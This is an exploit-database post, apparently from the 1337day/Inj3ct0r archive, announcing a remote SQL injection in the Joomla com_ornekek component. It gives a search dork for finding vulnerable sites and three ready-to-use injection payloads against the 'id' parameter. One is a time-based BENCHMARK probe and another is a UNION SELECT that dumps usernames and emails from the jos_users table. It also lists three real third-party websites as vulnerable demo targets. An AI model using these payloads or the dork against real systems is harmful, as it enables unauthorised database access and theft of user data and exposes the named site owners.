The Joomla Ornekek component suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
ed53efa46f46da8cb1dfe5fca149ead15336c5bba017235b2324569bafabcdcb
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| Joomla Component Com_Ornekek - SQL Injection Vulnerability |
--------------------------------------------------------------------------
+----------------| ABOUT ME |--------------------+
NAME: TAURUS OMAR -
HOME: ACCESOILEGAL.BLOGSPOT.COM -
TWITTER: @taurusomar_ -
E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
E-MAIL: omar-taurus[at]live[dot]com -
PWNED: #ZUUU -
+------------------------------------------------+
# Exploit Title: Joomla Component Com_Ornekek - SQL Injection Vulnerability
# Vendor Name: Joomla
# Url Vendor: http://www.joomla.org/
# Category: WebApps
# Type: php
# Dork: inurl:/index.php?option=com_ornekek&task=
# 0day exploits : 1337day.com Inj3ct0r Exploit DataBase
# Exploit Sample => http://site.com/index.php?option=com_ornekek&task=program&id=
# Exploit Comand => -999.9'+or+'x'%3D'y'+and+if(1%3D1%2CBENCHMARK(1528800%2CMD5(0x41))%2C0)+and+'x'%3D'x
# Exploit Comand => -999.9+union+select+1%2C2%2C3%2Cgroup_concat(0x3a5f%2Cusern ame%2C0x3a%2Cemail%2C0x5f3a)%2C5%2C6%2C7+from+jos_users--+union+all+select--
# Exploit Comand => -99+union+all+select+null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--
# Samples/Demo
http://www.rallyingwithprbenn.co.uk/index.php?option=com_ornekek&task=program&id= [ Sql ]
http://www.yewcraggsborrowdale.co.uk/index.php?option=com_ornekek&task=program&id= [ Sql ]
http://www.coledale-inn.co.uk/index.php?option=com_ornekek&task=program&id= [ Sql ]